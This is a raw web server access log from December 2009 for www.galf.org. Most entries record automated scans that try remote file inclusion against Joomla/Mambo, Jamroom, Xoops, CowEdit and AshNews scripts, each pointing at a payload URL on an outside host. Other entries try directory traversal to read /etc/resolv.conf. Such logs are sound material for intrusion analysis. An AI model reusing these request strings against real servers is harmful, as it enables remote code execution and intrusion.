75.151.248.42 - - [28/Dec/2009:02:24:24 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:24:39 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:02:24:53 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:02:24:53 -0800] "GET /logs/access_090727.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:02:24:57 -0800] "GET /logs/access_090720.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:26:34 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:26:34 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:26:34 -0800] "GET /logs/access_090727.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:26:34 -0800] "GET /logs/access_090720.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:02:26:38 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:02:26:38 -0800] "GET /logs/access_090727.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:02:26:38 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:02:26:43 -0800] "GET /logs/access_090720.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:30:12 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:30:12 -0800] "GET /logs/access.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:30:12 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:30:19 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.115.1.59 - - [28/Dec/2009:02:34:42 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
66.249.65.98 - - [28/Dec/2009:02:36:11 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:36:15 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:36:15 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:36:16 -0800] "GET /logs/access.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:36:22 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:36:24 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:45:03 -0800] "GET /logs/access_090720.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:45:03 -0800] "GET /logs/access_090727.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:46:52 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:46:57 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:47:02 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:47:43 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.55.207.93 - - [28/Dec/2009:02:48:00 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:50:27 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig.live.site=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:50:28 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig.live.site=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:50:28 -0800] "GET /logs/access.log%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig.live.site=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:02:50:58 -0800] "GET /logs/access_091123.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:02:50:59 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:02:50:59 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:02:50:59 -0800] "GET /logs/access_091102.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:51:21 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:02:51:48 -0800] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://cyberct.myitian.com/gnuboard4//data/member/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:02:51:48 -0800] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://cyberct.myitian.com/gnuboard4//data/member/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:51:53 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:52:38 -0800] "GET /logs/access_090720.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:52:38 -0800] "GET /logs/access_090727.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:52:49 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:02:53:48 -0800] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://cyberct.myitian.com/gnuboard4//data/member/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:02:53:49 -0800] "GET /logs/access_091214.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://cyberct.myitian.com/gnuboard4//data/member/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:02:53:55 -0800] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://cyberct.myitian.com/gnuboard4//data/member/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:02:53:59 -0800] "GET /logs/access_090824.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://cyberct.myitian.com/gnuboard4//data/member/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:02:54:18 -0800] "GET /logs/access_090824.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://cyberct.myitian.com/gnuboard4//data/member/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.93 - - [28/Dec/2009:02:54:33 -0800] "GET /labia/?N=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:55:41 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:02:55:55 -0800] "GET /logs/access_090803.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:02:56:12 -0800] "GET /logs/access_091123.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:56:34 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.80.193.32 - - [28/Dec/2009:02:56:38 -0800] "GET /labia23portugues/index.htm HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YComp 5.0.8.6)" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:02:58:17 -0800] "GET /addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:02:58:17 -0800] "GET /logs/access_091123.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:02:58:17 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:02:58:17 -0800] "GET /logs/access_091123.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:02:58:17 -0800] "GET /addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:02:58:17 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:02:58:18 -0800] "GET /logs/access_090720.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:02:58:19 -0800] "GET /logs/access_090720.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:58:24 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:02:58:55 -0800] "GET /logs/access_091026.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:02:58:56 -0800] "GET /logs/access_091026.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:02:59:10 -0800] "GET /logs/access_090713.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:02:59:10 -0800] "GET /logs/access_090713.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:02:59:20 -0800] "GET /logs/access_090817.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:02:59:33 -0800] "GET /logs/access_090706.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:02:59:34 -0800] "GET /logs/access_090706.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:59:55 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:03:00:13 -0800] "GET /logs/access_090615.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:03:00:13 -0800] "GET /logs/access_090615.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:03:00:15 -0800] "GET /logs/access_090824.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:03:00:15 -0800] "GET /logs/access_090824.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:03:00:23 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:03:00:23 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:03:00:25 -0800] "GET /logs/access_091102.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:03:00:25 -0800] "GET /logs/access_091123.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:03:00:45 -0800] "GET /logs/access_090622.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:03:00:46 -0800] "GET /logs/access_090622.log//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:03:01:26 -0800] "GET /logs/access_090706.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:03:02:03 -0800] "GET /logs/access_090817.log%20//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:03:02:04 -0800] "GET /logs/access_090817.log%20//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:03:02:17 -0800] "GET /logs/access_090824.log%20//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:03:02:18 -0800] "GET /logs/access_090824.log%20//addpost_newpoll.php?addpoll=preview&thispath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:03:03:12 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live.site=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
202.70.51.244 - - [28/Dec/2009:03:03:40 -0800] "GET /logs/ HTTP/1.1" 200 4942 "http://www.google.co.id/url?sa=t&source=web&ct=res&cd=1&ved=0CAoQFjAA&url=http%3A%2F%2Fwww.galf.org%2Flogs%2F&rct=j&q=index+of+%2Flogs&ei=bZA4S4LKD5GgsgPPo8XGBA&usg=AFQjCNHxPdRWtvkkSW5L74xwOZb_30Yffg" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB6 (.NET CLR 3.5.30729)" "www.galf.org"
202.70.51.244 - - [28/Dec/2009:03:03:51 -0800] "GET /logs/access.log HTTP/1.1" 200 320057 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB6 (.NET CLR 3.5.30729)" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:03:04:06 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:03:04:06 -0800] "GET /logs/access_091221.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:03:04:06 -0800] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:03:05:09 -0800] "GET /logs/access.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.205.250 - - [28/Dec/2009:03:05:09 -0800] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.205.250 - - [28/Dec/2009:03:05:09 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.176.234.205 - - [28/Dec/2009:03:07:06 -0800] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://cyberct.myitian.com/gnuboard4//data/member/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:03:07:07 -0800] "GET /logs/access_091214.log%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://cyberct.myitian.com/gnuboard4//data/member/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:03:07:12 -0800] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://cyberct.myitian.com/gnuboard4//data/member/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:03:07:14 -0800] "GET /logs/access_090824.log%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://cyberct.myitian.com/gnuboard4//data/member/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:03:07:25 -0800] "GET /logs/access_090914.log%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://cyberct.myitian.com/gnuboard4//data/member/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:03:07:59 -0800] "GET /logs/access_091102.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:03:08:05 -0800] "GET /logs/access_091123.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.144.71 - - [28/Dec/2009:03:08:41 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.144.71 - - [28/Dec/2009:03:08:41 -0800] "GET /ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.144.71 - - [28/Dec/2009:03:08:41 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.144.71 - - [28/Dec/2009:03:09:03 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.144.71 - - [28/Dec/2009:03:09:03 -0800] "GET /ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.144.71 - - [28/Dec/2009:03:09:03 -0800] "GET /logs/access_090831.log//ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.144.71 - - [28/Dec/2009:03:09:11 -0800] "GET /logs/access_090622.log//ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.144.71 - - [28/Dec/2009:03:09:59 -0800] "GET /ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.144.71 - - [28/Dec/2009:03:09:59 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.144.71 - - [28/Dec/2009:03:09:59 -0800] "GET /logs/access_090629.log//ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
